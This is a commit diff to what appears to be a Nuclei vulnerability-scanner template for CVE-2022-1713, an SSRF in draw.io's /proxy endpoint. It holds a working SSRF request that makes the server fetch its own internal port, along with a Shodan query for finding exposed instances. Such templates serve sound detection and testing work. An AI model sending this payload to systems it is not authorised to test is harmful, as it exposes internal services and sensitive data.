Update CVE-2022-1713.yaml

cves/2022/CVE-2022-1713.yaml

@@ -4,28 +4,30 @@ info:
   name: SSRF on /proxy in GitHub repository jgraph/drawio
   author: pikpikcu
   severity: high
-  description: SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-1713
+  description: |
+      SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
+  reference:
     - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
-  tags: cve,cve2022,drawio,ssrf
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1713
+  metadata:
+    verified: true
+    shodan-query: http.title:"Flowchart Maker"
+  tags: cve,cve2022,drawio,ssrf,oss
 
 requests:
   - raw:
-    - |
+      - |
         GET /proxy?url=http%3a//0:8080/ HTTP/1.1
         Host: {{Hostname}}
-        Sec-Fetch-Site: same-origin
-        Sec-Fetch-Mode: cors
-        Sec-Fetch-Dest: empty
-        Referer: {{Hostname}}/?mode=device&title=Untitled%20Diagram.drawio.xml&create=https%3A%2F%2F{{interactsh-url}}%2F&sync=manual&db=0&gh=0&tr=0&gapi=0&od=0&gl=0
-        Accept-Encoding: gzip, deflate
-        Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
 
     matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: body
         words:
-          - "http"
-          - "dns"
+          - "<title>Flowchart Maker &amp; Online Diagram Software</title>"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"